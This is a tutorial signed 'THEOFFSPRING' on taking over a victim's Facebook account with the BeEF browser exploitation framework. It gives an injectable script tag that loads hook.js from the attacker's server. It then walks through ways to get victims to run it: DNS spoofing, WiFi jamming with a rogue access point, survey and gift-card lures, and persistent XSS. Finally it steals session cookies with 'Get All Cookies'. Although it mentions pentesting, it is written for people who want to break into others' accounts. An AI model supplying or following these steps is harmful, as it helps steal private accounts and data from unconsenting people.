- /////////////////|||||||||||||||||||||||||||||||||||||\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
- 1 written by THEOFFSPRING
- ----- #optraining Facebook hacking with BeEF -----
- Introduction:
- __________________
- This guide was written as part of a pentesting challenge.
- It's aimed at all those who come crying for help with hacking Facebook;
- hopefully it will lead you to the wonderful land of pentesting.
- Requirements:
- __________________
- The only requirement for this guide is that you have BeEF installed; if you are using Kali, it comes pre-installed.
- For Kali: (Applications->Exploitation Tools->BeEF)
- Browser Exploitation Framework:
- __________________
- BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.
- Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration
- tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks,
- BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door:
- the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further
- attacks against the system from within the browser context.
- Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
- Browser Exploitation Framework (BeEF) - http://beefproject.com
- The guide:
- __________________
- In this guide I won't go into depth on how to use the tool; I'm just going to show you how to hook a browser and get all the cookies.
- Start the BeEF service and navigate to its web server (localhost:3000). The default credentials are beef:beef.
- Now that the service is started and we are logged in, we are ready to start using this powerful tool! From the web server you'll have access
- to all the information you need, all 'hooked' browsers and the logs. So far we haven't infected anyone, so the list will be empty.
- The key to hacking Facebook via BeEF is hooking a browser, which means getting the victim to execute our code, for example by getting
- the victim to visit a vulnerable web application. Our script injects code into the victim's browser, which then responds to commands we send from our BeEF server.
- Don't worry, you won't have to do any scripting yourself: BeEF has a JavaScript file, 'hook.js', and we just need to get the victim to execute it.
- This is the trickiest part, where you need to get creative. You can use social engineering, XSS, spoofing, etc.
- If you are on the same network as the victim, you can do DNS spoofing and get the victim to visit our malicious site, which will look legit
- apart from the fact that it has a simple script inside:
- <script src="http://[local_ip]:3000/hook.js"></script>
- (If you don't know your local_ip, just type "ifconfig" in a terminal)
- However, if the victim isn't on our network but is in WiFi range, we can fire up a WiFi jammer (aireplay-ng, or wifijammer from
- https://github.com/DanMcInerney/wifijammer) and start a rogue AP with a common name so the victim will automatically connect. All we need
- to do in that case is once again place the code above in our home page. We can also use a tool for all this called wifiphisher, from here:
- https://github.com/wifiphisher/wifiphisher
- The last scenario is that our victim is far away, so we have to do it online. Once again we just need to get the victim to execute that code
- once. With a simple web page we can use social engineering and ask the victim to check out our site, offer free gift cards for a short survey
- on the site, etc. I really can't go into much detail here because it depends on the situation; do a little intel before the attack and
- you shouldn't have any problems getting the victim to visit your site.
- Besides spoofing and social engineering we can use persistent XSS: if we manage to place our code on a vulnerable site, everyone who visits
- that (trusted) site will get 'infected' (hooked).
- Once you've hooked the victim's browser you will be able to access it via the BeEF web server. Once again you don't have to write any payloads
- yourself; there are prebuilt commands we can execute. Right now we have unlimited possibilities, but you're just interested in
- hacking fucking Facebook so let's do that. You'll need to choose "Get All Cookies". It will send a command to the browser, which will reply
- with all the cookies it has. You have successfully hacked someone's Facebook, now play around with the other options it has.
- ------------------------------------------------------------------------------------------------------------------
- ...